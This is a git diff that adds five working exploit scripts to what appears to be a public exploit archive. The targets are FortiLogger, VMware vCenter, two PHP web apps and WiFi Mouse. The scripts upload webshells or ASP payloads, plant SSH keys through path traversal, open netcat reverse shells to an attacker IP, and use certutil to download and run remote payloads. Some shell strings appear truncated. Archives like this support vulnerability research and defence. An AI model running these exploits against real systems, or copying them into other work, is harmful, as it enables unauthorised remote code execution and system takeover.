diff --git a/exploits/multiple/webapps/49600.rb b/exploits/multiple/webapps/49600.rb new file mode 100755 index 000000000..d7a92a658 --- /dev/null +++ b/exploits/multiple/webapps/49600.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::EXE + prepend Msf::Exploit::Remote::AutoCheck + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'FortiLogger Arbitrary File Upload Exploit', + 'Description' => %q{ + This module exploits an unauthenticated arbitrary file upload + via insecure POST request. It has been tested on version 4.4.2.2 in + Windows 10 Enterprise. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Berkan Er ' # Vulnerability discovery, PoC and Metasploit module + ], + 'References' => + [ + ['CVE', '2021-3378'], + ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/'] + ], + + 'Platform' => ['win'], + 'Privileged' => false, + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => + [ + [ + 'FortiLogger - 4.4.2.2', + { + 'Platform' => 'win' + } + ], + ], + 'DisclosureDate' => '2021-02-26', + 'DefaultTarget' => 0 + ) + ) + + register_options( + [ + Opt::RPORT(5000), + OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/']) + ], self.class + ) + end + + def check_product_info + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'), + 'method' => 'POST', + 'data' => '', + 'headers' => { + 'Accept' => 'application/json, text/javascript, */*; q=0.01', + 'Accept-Language' => 'en-US,en;q=0.5', + 'Accept-Encoding' => 'gzip, deflate', + 'X-Requested-With' => 'XMLHttpRequest' + } + ) + + return res + end + + def check + begin + res = check_product_info + if res && res.code == 200 + if JSON.parse(res.body)['Version'] == '4.4.2.2' + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + end + end + + def create_payload + Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s + end + + def exploit + begin + print_good('Generate Payload !') + data = create_payload + + boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" + post_data = "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"b3r.asp\"\r\n" + post_data << "Content-Type: image/png\r\n" + post_data << "\r\n#{data}\r\n" + post_data << "--#{boundary}\r\n" + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'), + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'headers' => { + 'Accept' => 'application/json', + 'Accept-Language' => 'en-US,en;q=0.5', + 'X-Requested-With' => 'XMLHttpRequest' + } + ) + if res && res.code == 200 + if JSON.parse(res.body)['Message'] == 'Error in saving file' + print_error('Error for upload payload..') + else + print_good('Payload has been uploaded !') + + handler + + print_status('Executing payload...') + send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'), + 'method' => 'GET' + }, 5) + end + end + end + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/49602.py b/exploits/multiple/webapps/49602.py new file mode 100755 index 000000000..5c6b6f425 --- /dev/null +++ b/exploits/multiple/webapps/49602.py @@ -0,0 +1,239 @@ +# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload +# Date: 2021-02-27 +# Exploit Author: Photubias +# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html +# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) +# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds +# CVE: CVE-2021-21972 + +#!/usr/bin/env python3 +''' + Copyright 2021 Photubias(c) + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + File name CVE-2021-21972.py + written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be + + CVE-2021-21972 is an unauthenticated file upload and overwrite, + exploitation can be done via SSH public key upload or a webshell + The webshell must be of type JSP, and its success depends heavily on the specific vCenter version + + # Manual verification: https:///ui/vropspluginui/rest/services/checkmobregister + # A white page means vulnerable + # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) + # Notes: + # * On Linux SSH key upload is always best, when SSH access is possible & enabled + # * On Linux the upload is done as user vsphere-ui:users + # * On Windows the upload is done as system user + # * vCenter 6.5 <=7515524 does not contain the vulnerable component "vropspluginui" + # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload + + This is a native implementation without requirements, written in Python 3. + Works equally well on Windows as Linux (as MacOS, probably ;-) + + Features: vulnerability checker + exploit +''' + +import os, tarfile, sys, optparse, requests +requests.packages.urllib3.disable_warnings() + +lProxy = {} +SM_TEMPLATE = b''' + + + <_this type="ServiceInstance">ServiceInstance + + + ''' +sURL = sFile = sRpath = sType = None + +def parseArguments(options): + global sURL, sFile, sType, sRpath, lProxy + if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') + sURL = options.url + if sURL[-1:] == '/': sURL = sURL[:-1] + if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL + sFile = options.file + if not os.path.exists(sFile): exit('[-] File not found: ' + sFile) + sType = 'ssh' + if options.type: sType = options.type + if options.rpath: sRpath = options.rpath + else: sRpath = None + if options.proxy: lProxy = {'https': options.proxy} + +def getVersion(sURL): + def getValue(sResponse, sTag = 'vendor'): + try: return sResponse.split('<' + sTag + '>')[1].split('')[0] + except: pass + return '' + oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) + #print(oResponse.text) + if oResponse.status_code == 200: + sResult = oResponse.text + if not 'VMware' in getValue(sResult, 'vendor'): + exit('[-] Not a VMware system: ' + sURL) + else: + sName = getValue(sResult, 'name') + sVersion = getValue(sResult, 'version') # e.g. 7.0.0 + sBuild = getValue(sResult, 'build') # e.g. 15934073 + sFull = getValue(sResult, 'fullName') + print('[+] Identified: ' + sFull) + return sVersion, sBuild + exit('[-] Not a VMware system: ' + sURL) + +def verify(sURL): + #return True + sURL += '/ui/vropspluginui/rest/services/uploadova' + try: + oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) + except: + exit('[-] System not available: ' + sURL) + if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely + else: return False + +def createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): + def getResourcePath(): + oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) + return oResponse.text.split('static/')[1].split('/')[0] + oTar = tarfile.open('payloadLin.tar','w') + if sRpath: ## version & build not important + if sRpath[0] == '/': sRpath = sRpath[1:] + sPayloadPath = '../../' + sRpath + oTar.add(sFile, arcname=sPayloadPath) + oTar.close() + return 'absolute' + elif sType.lower() == 'ssh': ## version & build not important + sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' + oTar.add(sFile, arcname=sPayloadPath) + oTar.close() + return 'ssh' + elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): + ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber + sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) + print('[!] Selected uploadpath: ' + sPayloadPath[5:]) + for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i) + oTar.close() + return 'webshell' + elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631): + ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/ + sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile) + print('[!] Selected uploadpath: ' + sPayloadPath[5:]) + oTar.add(sFile, arcname=sPayloadPath) + oTar.close() + return 'backdoor' + else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0): + ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/) + sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile) + print('[!] Selected uploadpath: ' + sPayloadPath[5:]) + oTar.add(sFile, arcname=sPayloadPath) + oTar.close() + return 'backdoor' + + +def createTarWin(sFile, sRpath = None): + ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows + if sRpath: + if sRpath[0] == '/': sRpath = sRpath[:1] + sPayloadPath = '../../' + sRpath + else: + sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile) + oTar = tarfile.open('payloadWin.tar','w') + oTar.add(sFile, arcname=sPayloadPath) + oTar.close() + +def uploadFile(sURL, sUploadType, sFile): + #print('[!] Uploading ' + sFile) + sFile = os.path.basename(sFile) + sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova' + arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')} + ## Linux + oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy) + if oResponse.status_code == 200: + if oResponse.text == 'SUCCESS': + print('[+] Linux payload uploaded succesfully.') + if sUploadType == 'ssh': + print('[+] SSH key installed for user \'vsphere-ui\'.') + print(' Please run \'ssh vsphere-ui@' + sURL.replace('https://','') + '\'') + return True + elif sUploadType == 'webshell': + sWebshell = sURL + '/ui/resources/' + sFile + #print('testing ' + sWebshell) + oResponse = requests.get(sWebshell, verify=False, proxies = lProxy) + if oResponse.status_code != 404: + print('[+] Webshell verified, please visit: ' + sWebshell) + return True + elif sUploadType == 'backdoor': + sWebshell = sURL + '/ui/resources/' + sFile + print('[+] Backdoor ready, please reboot or wait for a reboot') + print(' then open: ' + sWebshell) + else: ## absolute + pass + ## Windows + arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')} + oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy) + if oResponse.status_code == 200: + if oResponse.text == 'SUCCESS': + print('[+] Windows payload uploaded succesfully.') + if sUploadType == 'backdoor': + print('[+] Absolute upload looks OK') + return True + else: + sWebshell = sURL + '/statsreport/' + sFile + oResponse = requests.get(sWebshell, verify=False, proxies = lProxy) + if oResponse.status_code != 404: + print('[+] Webshell verified, please visit: ' + sWebshell) + return True + return False + +if __name__ == "__main__": + usage = ( + 'Usage: %prog [option]\n' + 'Exploiting Windows & Linux vCenter Server\n' + 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \'\'\n' + 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\n' + 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') + + parser = optparse.OptionParser(usage=usage) + parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') + parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') + parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') + parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') + parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') + + (options, args) = parser.parse_args() + + parseArguments(options) + + ## Verify + if verify(sURL): print('[+] Target vulnerable: ' + sURL) + else: exit('[-] Target not vulnerable: ' + sURL) + + ## Read out the version + sVersion, sBuild = getVersion(sURL) + if sRpath: print('[!] Ready to upload your file to ' + sRpath) + elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \'' + sFile + '\'') + else: print('[!] Ready to upload webshell \'' + sFile + '\'') + sAns = input('[?] Want to exploit? [y/N]: ') + if not sAns or not sAns[0].lower() == 'y': exit() + + ## Create TAR file + sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) + if not sUploadType == 'ssh': createTarWin(sFile, sRpath) + + ## Upload and verify + uploadFile(sURL, sUploadType, sFile) + + ## Cleanup + os.remove('payloadLin.tar') + os.remove('payloadWin.tar') \ No newline at end of file diff --git a/exploits/php/webapps/49603.py b/exploits/php/webapps/49603.py new file mode 100755 index 000000000..cfdcc2b23 --- /dev/null +++ b/exploits/php/webapps/49603.py @@ -0,0 +1,55 @@ +# Exploit Title: Online Catering Reservation System 1.0 - Unauthenticated Remote Code Execution +# Date: 28-02-2021 +# Exploit Author: Christian Vierschilling +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/11355/online-catering-reservation.html +# Version: 1.0 +# Tested on: PHP 7.4.14, Linux x64_x86 + +# --- Description --- # + +#The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. + +# --- Proof of concept --- # + +#!/usr/bin/python3 +import random +import sys +import requests +from requests_toolbelt.multipart.encoder import MultipartEncoder + +def file_upload(target_ip, attacker_ip, attacker_port): + random_file_name = str(random.randint(100000, 999999)) + "revshell.php" + revshell_string = '&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) + m = MultipartEncoder(fields={'id': '1337', 'menu':'PWN', 'cat': '1337', 'subcat':'PWN','desc':'PWN','price':'13.37', 'image': (random_file_name, revshell_string, 'application/x-php'),'update':''}) + print("(+) Uploading php reverse shell..") + r1 = requests.post('http://{}/reservation/admin/menu_update.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) + if "Successfully updated menu details!" in r1.text: + print("(+) File upload seems to have been successful!") + return random_file_name + else: + print("(-) Oh no, file upload seems to have failed.. quitting.") + exit() + +def trigger_shell(target_ip, filename): + url = 'http://{}/reservation/images/{}'.format(target_ip, filename) + print("(+) Now trying to trigger our shell by requesting {} ..".format(url)) + r2 = requests.get(url) + return None + +def main(): + if len(sys.argv) != 4: + print('(+) usage: %s ' % sys.argv[0]) + print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) + sys.exit(-1) + + target_ip = sys.argv[1] + attacker_ip = sys.argv[2] + attacker_port = sys.argv[3] + + uploaded_filename = file_upload(target_ip, attacker_ip, attacker_port) + trigger_shell(target_ip, uploaded_filename) + print("\n(+) done!") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/49604.py b/exploits/php/webapps/49604.py new file mode 100755 index 000000000..651dbfa41 --- /dev/null +++ b/exploits/php/webapps/49604.py @@ -0,0 +1,57 @@ +# Exploit Title: Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated) +# Date: 28-02-2021 +# Exploit Author: Christian Vierschilling +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14728/covid-19-contact-tracing-system-web-app-qr-code-scanning-using-php-source-code.html +# Version: 1.0 +# Tested on: PHP 7.4.14, Linux x64_x86 + +# --- Description --- # + +# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. + +# --- Proof of concept --- # + +#!/usr/bin/python3 +import random +import sys +import requests +from requests_toolbelt.multipart.encoder import MultipartEncoder + +def file_upload(target_ip, attacker_ip, attacker_port): + random_file_name = str(random.randint(100000, 999999)) + "revshell.php" + revshell_string = '&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) + m = MultipartEncoder(fields={'name': 'PWNED', 'img': (random_file_name, revshell_string, 'application/x-php')}) + print("(+) Uploading php reverse shell..") + r1 = requests.post('http://{}/cts_qr/classes/SystemSettings.php?f=update_settings'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) + if r1.text == '1': + print("(+) File upload seems to have been successful!") + return None + else: + print("(-) Oh no, the file upload seems to have failed!") + exit() + +def trigger_shell(target_ip): + print("(+) Now trying to trigger our shell..") + + #The file we uploaded previously is expected to be an image that the web app tries to embed into the login page. + #So by requesting the login page, our reverse shell php file will get triggered automatically. We dont even need to calculate the random bits of its new name. + r2 = requests.get('http://{}/cts_qr/login.php'.format(target_ip)) + return None + +def main(): + if len(sys.argv) != 4: + print('(+) usage: %s ' % sys.argv[0]) + print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) + sys.exit(-1) + + target_ip = sys.argv[1] + attacker_ip = sys.argv[2] + attacker_port = sys.argv[3] + + file_upload(target_ip, attacker_ip, attacker_port) + trigger_shell(target_ip) + print("\n(+) done!") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/remote/49601.py b/exploits/windows/remote/49601.py new file mode 100755 index 000000000..d0ce1f16a --- /dev/null +++ b/exploits/windows/remote/49601.py @@ -0,0 +1,77 @@ +# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution +# Date: 25-02-2021 +# Author: H4rk3nz0 +# Vendor Homepage: http://necta.us/ +# Software Link: http://wifimouse.necta.us/#download +# Version: 1.7.8.5 +# Tested on: Windows Enterprise Build 17763 + +# Desktop Server software used by mobile app has PIN option which does not to prevent command input. +# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. + +#!/usr/bin/python + +from socket import socket, AF_INET, SOCK_STREAM +from time import sleep +import sys +import string + +target = socket(AF_INET, SOCK_STREAM) +port = 1978 + +try: + rhost = sys.argv[1] + lhost = sys.argv[2] + payload = sys.argv[3] +except: + print("USAGE: python " + sys.argv[0]+ " ") + exit() + + +characters={ + "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", + "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", + "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", + "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", + "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", + " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", + ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", + "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", + "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} + + +def openCMD(): + target.sendto("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a".decode("hex"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe + +def SendString(string): + for char in string: + target.sendto(("7574663820" + characters[char] + "0a").decode("hex"),(rhost,port)) # Sends Character hex with packet padding + sleep(0.03) + +def SendReturn(): + target.sendto("6b657920203352544e".decode("hex"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app + sleep(0.5) + +def exploit(): + print("[+] 3..2..1..") + sleep(2) + openCMD() + print("[+] *Super fast hacker typing*") + sleep(1) + SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) + SendReturn() + print("[+] Retrieving payload") + sleep(3) + SendString("C:\\Windows\\Temp\\" + payload) + SendReturn() + print("[+] Done! Check Your Listener?") + + +def main(): + target.connect((rhost,port)) + exploit() + target.close() + exit() + +if __name__=="__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3af14f7cb..f19837ecf 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18390,6 +18390,7 @@ id,file,description,date,author,type,platform,port 49418,exploits/multiple/remote/49418.py,"Erlang Cookie - Remote Code Execution",2021-01-13,1F98D,remote,multiple, 49594,exploits/windows/remote/49594.py,"ASUS Remote Link 1.1.2.13 - Remote Code Execution",2021-02-25,H4rk3nz0,remote,windows, 49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows, +49601,exploits/windows/remote/49601.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution",2021-03-01,H4rk3nz0,remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -43788,3 +43789,7 @@ id,file,description,date,author,type,platform,port 49596,exploits/php/webapps/49596.txt,"Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)",2021-02-26,sml,webapps,php, 49597,exploits/php/webapps/49597.txt,"Triconsole 3.75 - Reflected XSS",2021-02-26,"Akash Chathoth",webapps,php, 49598,exploits/multiple/webapps/49598.txt,"LightCMS 1.3.4 - 'exclusive' Stored XSS",2021-02-26,Peithon,webapps,multiple, +49600,exploits/multiple/webapps/49600.rb,"FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-01,"Berkan Er",webapps,multiple, +49602,exploits/multiple/webapps/49602.py,"VMware vCenter Server 7.0 - Unauthenticated File Upload",2021-03-01,Photubias,webapps,multiple, +49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php, +49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,